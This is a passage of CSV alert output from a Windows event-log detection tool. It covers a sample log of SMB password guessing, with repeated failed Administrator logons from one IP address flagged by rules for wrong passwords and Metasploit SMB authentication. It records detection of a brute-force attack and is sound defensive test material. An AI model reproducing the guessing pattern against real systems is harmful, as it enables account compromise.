SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: 
